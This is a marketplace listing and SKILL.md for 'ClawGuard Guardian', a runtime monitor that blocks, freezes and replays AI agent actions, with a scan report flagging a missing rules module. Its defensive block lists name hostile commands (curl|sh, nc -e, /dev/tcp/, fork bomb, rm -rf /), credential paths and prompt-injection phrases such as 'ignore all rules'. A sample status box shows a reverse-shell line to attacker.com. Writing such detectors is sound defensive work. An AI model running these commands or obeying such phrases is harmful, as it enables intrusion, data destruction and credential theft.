Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

ClawGuard-Guardian

v3.0.0

ClawGuard Guardian v3 - Runtime guardian with behavior monitoring, interception, session freeze/replay, and emergency response

License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal: Benign
OpenClaw: Suspicious (medium confidence)
! Purpose & Capability
Name/description claim a runtime guardian (monitoring, interception, freeze/replay). The included code implements session tracking, logging, replay, freeze/unfreeze and blocking logic, which is broadly consistent. However the core rules are required via require('../../shared/rules/interceptor-rules.js')—a file outside the package that is not included or declared. That external dependency is unexplained and necessary for decision logic, creating an incoherence between claimed self-contained capability and actual runtime requirements.
! Instruction Scope
SKILL.md instructs monitoring of commands, files, network, and prompt injections and describes blocking/confirm behaviors for sensitive paths (e.g., /etc, /.aws). The packaged code reads/writes logs under ~/.clawguard and provides replay/freeze operations, but there is no clear code that hooks into an agent runtime to intercept ALL agent actions or network calls. The instructions imply agent-level interception and broad filesystem awareness; the implementation as shipped does not include the external rule module or other integration modules referenced in README (Detect, Shield, Auditor), so the runtime scope is ambiguous and possibly incomplete.
Install Mechanism
There is no install spec and package.json has no dependencies; code is included in the bundle and will run locally with node. This avoids remote downloads (lower install risk). However, because code expects an external shared rules module outside the package, proper operation may depend on platform-provided files—this is an installation/integration dependency that is not declared.
Credentials
The skill does not request environment variables, binaries, or credentials. It persistently reads/writes logs under the user's home (~/.clawguard/logs/) and may read those logs and other files when replaying sessions. The SKILL.md and code reference monitoring reads of system paths (e.g., /etc) in rules/examples; although these are for blocking/monitoring, the skill's access to home and potential to reference system paths is notable and should be considered before installing on systems with sensitive files.
Persistence & Privilege
always:false (normal). The skill will create/read persistent logs in ~/.clawguard and maintains session state on disk. It does not declare modifications to other skills or system-wide agent settings. Autonomous invocation is allowed (platform default) — combine this with the other concerns (external rule dependency and broad monitoring instructions) when deciding risk.
What to consider before installing
This package mostly looks like a legitimate local 'guardian' tool but there are important inconsistencies you should resolve before installing or enabling it:

  • Missing external rules: The code requires '../../shared/rules/interceptor-rules.js' which is not included. Ask the author where that file comes from (platform-provided, separate package, or omitted). Running the skill without that module may produce unexpected behavior or silently fall back to insecure defaults.
  • Verify integration surface: SKILL.md implies agent-level interception of commands, files, and network activity, but the shipped code appears to be a standalone CLI that reads/writes ~/.clawguard logs. Confirm how this skill is intended to hook into your agent runtime and whether additional platform components (Detect/Shield/Auditor) are required.
  • Inspect omitted implementations: The audit logger and referenced modules (Detect/Shield/etc.) are not present in the package excerpt. Request full source or a signed release, and review any code that handles I/O, network, or dynamic requires before running.
  • Run in isolation: If you test it, run it in an isolated environment (non-production account/machine) and monitor filesystem and network activity (e.g., with auditd or network monitoring) to ensure it does not exfiltrate data.
  • Least privilege and logs: Expect it to create persistent logs in ~/.clawguard; if that is unacceptable for your environment, do not install. If you need this functionality, prefer a version that bundles all dependencies or points to a verified, auditable rules module and a public source/homepage.

If the author can provide the missing rules module and clarify how the skill integrates with the agent (and show there are no hidden remote endpoints), the assessment could move toward benign. Right now, the unexplained external dependency and mismatch between instructions and shipped code justify caution.

Like a lobster shell, security has layers — review code before you run it.


SKILL.md

🛡️ ClawGuard Guardian (CG-GD) v3

Runtime guardian for monitoring, intercepting, and controlling AI agent operations. Provides real-time behavior monitoring, risk-based interception, session replay, and emergency freeze capabilities.

When to Use

Activate ClawGuard Guardian when:

  • A user asks to start guardian or monitoring
  • User asks to view status or logs
  • User asks to replay or freeze sessions
  • Emergency response is needed
  • User asks "start monitoring" or "show status"

How to Execute

Command 1: Start Monitoring

User: Start guardian
Agent:
🛡️ Guardian starting...
   Session ID: session-xxx
   Status: ACTIVE
   Monitoring: Commands, Files, Network, Prompt Injections

Command 2: View Status

User: Show status
Agent:
╔═══════════════════════════════════════════════════════════════╗
║                 🛡️ Guardian Status                      ║
╠═══════════════════════════════════════════════════════════════╣
║  Current Status: 🟢 ACTIVE                              ║
║  Session ID: session-xxx                               ║
║  Operations: XXX                                       ║
║  Blocked: X                                            ║
║  Frozen Sessions: X                                    ║
╚═══════════════════════════════════════════════════════════════╝

Command 3: Freeze Session

User: Freeze session
Agent:
🛡️ Session frozen: session-xxx
   Time: YYYY-MM-DD HH:MM:SS
   Pending ops: X

   Type "unfreeze" to resume.

Command 4: Replay Session

User: Replay session
Agent:
📺 Session Replay:
   ✅ [10:30:01] Command: ls -la
   ✅ [10:30:05] File: Read /tmp/test.txt
   🚫 [10:30:10] File: /etc/passwd (BLOCKED)
   ✅ [10:30:15] Network: api.github.com

Command 5: View Logs

User: Show logs
Agent:
📜 Recent Logs (50 lines):
   🟢 [10:30:01] ls -la /workspace
   🟢 [10:30:05] Read /tmp/test.txt
   🚫 [10:30:10] Try Read /etc/passwd (BLOCKED)

Monitoring Capabilities

Type 1: Command Monitoring

Guardian monitors executed commands:

| Pattern | Risk | Action |
|---|---|---|
| rm -rf /home | 🔴 CRITICAL | BLOCK |
| curl\|sh | 🔴 CRITICAL | BLOCK |
| nc -e | 🔴 CRITICAL | BLOCK |
| sudo su | 🟠 HIGH | WARN |
| rm -rf | 🟠 HIGH | CONFIRM |
| chmod 777 | 🟠 HIGH | CONFIRM |

Type 2: File Operation Monitoring

| Pattern | Risk | Action |
|---|---|---|
| /.ssh/ | 🔴 CRITICAL | BLOCK |
| /.aws/ | 🔴 CRITICAL | BLOCK |
| /.kube/ | 🔴 CRITICAL | BLOCK |
| /etc/ | 🟠 HIGH | CONFIRM |
| /root/ | 🔴 CRITICAL | BLOCK |
| /.env | 🟠 HIGH | WARN |

Type 3: Network Monitoring

| Pattern | Risk | Action |
|---|---|---|
| .onion | 🔴 CRITICAL | BLOCK |
| evil.com | 🔴 CRITICAL | BLOCK |
| Unknown domains | 🟡 MEDIUM | LOG |
| External API | 🟡 MEDIUM | LOG |

Type 4: Prompt Injection Monitoring

| Pattern | Risk | Action |
|---|---|---|
| DAN jailbreak | 🔴 CRITICAL | BLOCK |
| ignore all rules | 🟠 HIGH | WARN |
| Zero-width chars | 🟠 HIGH | STRIP |
| Role hijacking | 🟡 MEDIUM | LOG |

Interception Rules

Path Rules

const PATH_RULES = {
  // Absolute deny
  DENY: [
    '/etc/passwd',
    '/etc/shadow',
    '/etc/sudoers',
    '/etc/cron.d',
    '/root/.*',
    '/.ssh/.*',
    '/.aws/.*',
    '/.kube/.*',
    '/.docker/.*'
  ],

  // Confirm required
  CONFIRM: [
    '/etc/',
    '/var/',
    '/usr/local/'
  ],

  // Allowed (whitelist)
  ALLOW: [
    '/tmp/.*',
    '/workspace/.*',
    '~/projects/.*'
  ]
};
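
The page does not show how these lists are evaluated, so the following is an added example, not ClawGuard's own code: one way to apply PATH_RULES so that ".." segments and "~" are resolved before matching and a denied path cannot slip through an ALLOW entry. The function names, the regex interpretation of the entries, the DENY > CONFIRM > ALLOW precedence and the confirm-by-default fallback are assumptions.

```javascript
const path = require('node:path');
const os = require('node:os');

// Rule lists copied from the Path Rules section above.
const PATH_RULES = {
  DENY: ['/etc/passwd', '/etc/shadow', '/etc/sudoers', '/etc/cron.d', '/root/.*',
    '/.ssh/.*', '/.aws/.*', '/.kube/.*', '/.docker/.*'],
  CONFIRM: ['/etc/', '/var/', '/usr/local/'],
  ALLOW: ['/tmp/.*', '/workspace/.*', '~/projects/.*']
};

const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');

// Expand a leading "~" and collapse "." and ".." segments, so rules are
// matched against the path that would be opened, not the string as typed.
// Lexical only: symlinks are not resolved (fs.realpathSync does that for
// paths that already exist).
function canonicalize(p, home, cwd) {
  const expanded = p === '~' || p.startsWith('~/') ? home + p.slice(1) : p;
  return path.posix.resolve(cwd, expanded);
}

// Hypothetical evaluator. Assumptions: entries are regular expressions,
// precedence is DENY > CONFIRM > ALLOW, and unlisted paths need confirmation.
function decidePath(p, { home = os.homedir(), cwd = process.cwd() } = {}) {
  const target = canonicalize(p, home, cwd);
  // DENY: unanchored search, so '/.ssh/.*' also covers /home/<user>/.ssh/.
  if (PATH_RULES.DENY.some((r) => new RegExp(r).test(target))) return 'BLOCK';
  // CONFIRM: prefix match from the filesystem root only.
  if (PATH_RULES.CONFIRM.some((r) => new RegExp('^' + r).test(target))) return 'CONFIRM';
  // ALLOW: whole-path match, with "~" in the rule expanded to the home directory.
  const allowed = PATH_RULES.ALLOW.some((r) => {
    const rule = r.startsWith('~/') ? escapeRe(home) + r.slice(1) : r;
    return new RegExp('^(?:' + rule + ')$').test(target);
  });
  return allowed ? 'ALLOW' : 'CONFIRM';
}
```

Matching DENY unanchored over-blocks (for example a project file named etc/passwd under /workspace), which is the safer direction for a deny list; ALLOW is anchored so that a "/tmp/" segment deep inside another tree does not qualify.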

Command Rules

const COMMAND_RULES = {
  // Absolute deny
  DENY: [
    'rm -rf /',
    'rm -rf /home',
    'rm -rf /root',
    ':(){ :|:& };:',  // Fork bomb
    'dd if=.*of=/dev/',
    'mkfs',
    'fdisk',
    'curl.*\\|.*sh',
    'wget.*\\|.*sh',
    'nc -e',
    '/dev/tcp/'
  ],

  // Confirm required
  CONFIRM: [
    'rm -rf',
    'chmod 777',
    'chmod +x',
    'killall',
    'pkill',
    'shutdown',
    'reboot'
  ]
};

Network Rules

const NETWORK_RULES = {
  // Deny hosts
  DENY_HOSTS: [
    '*.onion',
    '*.i2p',
    'evil.com',
    'attacker.com',
    'malicious.com'
  ],

  // Confirm ports
  CONFIRM_PORTS: [22, 23, 25, 3306, 5432, 6379, 27017],

  // Max upload size
  MAX_UPLOAD_SIZE: 10 * 1024 * 1024  // 10MB
};

Session Management

Session States

| State | Description | Actions Available |
|---|---|---|
| ACTIVE | Currently running | Monitor, Block, Freeze |
| FROZEN | Paused | Unfreeze, Replay, Export |
| COMPLETED | Finished | Replay, Export |
| TERMINATED | Emergency stop | Archive |

Freeze Actions

When a session is frozen:

  1. All pending operations are paused
  2. No new operations can start
  3. Evidence is preserved
  4. User is notified

🛡️ SESSION FROZEN
────────────────────────────────────────
Session ID: session-xxx
Frozen at: YYYY-MM-DD HH:MM:SS
Operations pending: X
Last operation: Read /etc/passwd

Type "unfreeze session-xxx" to resume.

Unfreeze Actions

User: Unfreeze session-xxx
Agent:
✅ Session unfrozen: session-xxx
   Resumed at: YYYY-MM-DD HH:MM:SS
   Pending operations: X

Audit Logging

Log Format

{
  "timestamp": "YYYY-MM-DDTHH:mm:ss.sssZ",
  "sessionId": "session-xxx",
  "type": "operation|block|freeze|unfreeze",
  "action": "command|file|network",
  "target": "/path/to/resource",
  "result": "SUCCESS|BLOCKED|FROZEN",
  "riskLevel": "INFO|WARNING|HIGH|CRITICAL",
  "details": {}
}

Log Storage

  • Location: ~/.clawguard/logs/
  • Format: audit-YYYY-MM-DD.jsonl
  • Rotation: 100MB per file, 10 files max
  • Retention: 30 days

Response Actions

Risk-Based Responses

| Risk Level | Icon | Response | Guardian Action |
|---|---|---|---|
| INFO | 🟢 | Allow | Log only |
| WARNING | 🟡 | Allow + Warn | Log + Alert |
| HIGH | 🟠 | Confirm | Ask user |
| CRITICAL | 🔴 | Block | Auto-block + Alert |

Automated Responses

| Detection | Guardian Response |
|---|---|
| SSH key access | Block + Freeze |
| Reverse shell | Kill + Block + Alert |
| Data exfiltration | Block + Freeze + Preserve |
| Fork bomb | Block immediately |
| Mass file delete | Block + Confirm |

Session Replay

Replay Format

📺 Session Replay: session-xxx
────────────────────────────────────────
Start: YYYY-MM-DD HH:MM:SS
Duration: XX minutes
Operations: XX

Timeline:
🟢 [10:30:01] Command: ls -la /workspace
🟢 [10:30:05] Read: /tmp/data.json
🟢 [10:30:10] Write: /workspace/output.txt
🟢 [10:30:15] Network: GET api.github.com
🟡 [10:30:20] Read: /var/log/syslog (WARNING)
🚫 [10:30:25] Write: /etc/cron.d/malware (BLOCKED)
🟢 [10:30:30] Command: git status

────────────────────────────────────────
Blocked: 1 | Warnings: 1 | Allowed: 6
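
An added example, not part of the skill's code: a reader for audit entries in the Log Format above that reproduces the replay summary line and reports malformed lines instead of silently skipping them. The function names, the sample session ID and the sample date are constructed; counting a WARNING entry with result SUCCESS as both a warning and an allowed operation is an assumption taken from the totals in the replay above.

```javascript
const ENUMS = {
  type: ['operation', 'block', 'freeze', 'unfreeze'],
  action: ['command', 'file', 'network'],
  result: ['SUCCESS', 'BLOCKED', 'FROZEN'],
  riskLevel: ['INFO', 'WARNING', 'HIGH', 'CRITICAL']
};

// Return null for a well-formed entry, otherwise the reason it is rejected.
function validateEntry(e) {
  if (typeof e !== 'object' || e === null) return 'not an object';
  if (Number.isNaN(Date.parse(e.timestamp))) return 'bad timestamp';
  if (typeof e.sessionId !== 'string' || typeof e.target !== 'string') return 'bad sessionId/target';
  const bad = Object.keys(ENUMS).find((f) => !ENUMS[f].includes(e[f]));
  return bad ? `bad ${bad}` : null;
}

// Summarise one session from JSONL text. Malformed lines are reported with
// their line number instead of being dropped or aborting the whole replay.
function summarizeSession(jsonl, sessionId) {
  const out = { blocked: 0, warnings: 0, allowed: 0, rejected: [] };
  jsonl.split('\n').forEach((line, i) => {
    if (!line.trim()) return;
    let e, reason;
    try { e = JSON.parse(line); reason = validateEntry(e); } catch { reason = 'not JSON'; }
    if (reason) { out.rejected.push({ line: i + 1, reason }); return; }
    if (e.sessionId !== sessionId) return;
    if (e.result === 'BLOCKED') out.blocked += 1;
    if (e.result === 'SUCCESS') out.allowed += 1;
    if (e.riskLevel === 'WARNING') out.warnings += 1;
  });
  return out;
}

// Constructed sample mirroring the replay timeline above (the date is made up).
const mk = (t, type, action, target, result, riskLevel) => JSON.stringify({
  timestamp: `2025-01-01T${t}.000Z`, sessionId: 'session-demo',
  type, action, target, result, riskLevel, details: {} });
const SAMPLE_JSONL = [
  mk('10:30:01', 'operation', 'command', 'ls -la /workspace', 'SUCCESS', 'INFO'),
  mk('10:30:05', 'operation', 'file', '/tmp/data.json', 'SUCCESS', 'INFO'),
  mk('10:30:10', 'operation', 'file', '/workspace/output.txt', 'SUCCESS', 'INFO'),
  mk('10:30:15', 'operation', 'network', 'api.github.com', 'SUCCESS', 'INFO'),
  mk('10:30:20', 'operation', 'file', '/var/log/syslog', 'SUCCESS', 'WARNING'),
  mk('10:30:25', 'block', 'file', '/etc/cron.d/malware', 'BLOCKED', 'CRITICAL'),
  mk('10:30:30', 'operation', 'command', 'git status', 'SUCCESS', 'INFO'),
  '{"timestamp":"2025-01-01T10:30:31.000Z","sessionId":"session-demo"', // truncated write
  mk('10:30:32', 'operation', 'file', '/tmp/x', 'SUCCESS', 'VERBOSE') // unknown riskLevel
].join('\n');
```

A non-empty rejected list is worth alerting on in its own right: a truncated or off-schema line in an audit file means the summary under-reports what happened in the session.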

Export Options

# Export as JSON
session export session-xxx --format json

# Export as report
session export session-xxx --format report

# Export evidence
session export session-xxx --evidence

Quick Commands Reference

| Command | Description |
|---|---|
| start | Start Guardian monitoring |
| status | Show current status |
| freeze [id] | Freeze session |
| unfreeze [id] | Unfreeze session |
| replay [id] | Replay session |
| logs [lines] | Show recent logs |
| export [id] | Export session |

Guardian Integration

With Auditor

[Skill Installation]
         │
         ▼
┌─────────────────┐
│  ClawGuard      │
│  Auditor        │
│  (Pre-flight)   │
└────────┬────────┘
         │ APPROVED
         ▼
┌─────────────────┐
│  ClawGuard      │◄──────── Guardian monitors
│  Guardian       │          ongoing operations
│  (Runtime)      │
└────────┬────────┘
         │
         ▼
    [Safe Operation]

With Detect

[Threat Detected]
         │
         ▼
┌─────────────────┐
│  ClawGuard      │
│  Detect         │
└────────┬────────┘
         │ CRITICAL
         ▼
┌─────────────────┐
│  ClawGuard      │
│  Guardian       │
│  (Auto-freeze)  │
└─────────────────┘

Output Format Examples

Status Output

╔═══════════════════════════════════════════════════════════════╗
║                 🛡️ Guardian Status                      ║
╠═══════════════════════════════════════════════════════════════╣
║  Status:        🟢 ACTIVE                             ║
║  Session ID:    session-xxx                             ║
║  Start Time:   YYYY-MM-DD HH:MM:SS                     ║
╠═══════════════════════════════════════════════════════════════╣
║  Operations:   128                                   ║
║  Blocked:       3                                     ║
║  Warnings:      12                                    ║
║  Frozen:        0                                    ║
╠═══════════════════════════════════════════════════════════════╣
║  Monitoring:    Commands ✓ Files ✓ Network ✓ Injections  ║
╚═══════════════════════════════════════════════════════════════╝

Freeze Confirmation

╔═══════════════════════════════════════════════════════════════╗
║  🛡️ SESSION FROZEN                                      ║
╠═══════════════════════════════════════════════════════════════╣
║  Session: session-xxx                                   ║
║  Frozen: YYYY-MM-DD HH:MM:SS                           ║
║  Reason: CRITICAL threat detected                       ║
║  Last Op: nc -e /bin/bash attacker.com 4444            ║
╠═══════════════════════════════════════════════════════════════╣
║  Pending: 3 operations                                 ║
║  Evidence: Preserved                                    ║
╚═══════════════════════════════════════════════════════════════╝

Type "unfreeze session-xxx" to resume.

v3 vs v2 Features

| Feature | v2 | v3 |
|---|---|---|
| Command Monitoring | Basic | |
| File Monitoring | Basic | |
| Network Monitoring | Basic | |
| Session Freeze | | ✅ (v3) |
| Session Replay | | ✅ (v3) |
| Evidence Preservation | | ✅ (v3) |
| Auto-freeze on Critical | | ✅ (v3) |
| Rule Engine | | ✅ (v3) |
| Audit Export | | ✅ (v3) |
| Integration with Detect | | ✅ (v3) |

ClawGuard Guardian: Vigilant protection, real-time control. 🛡️
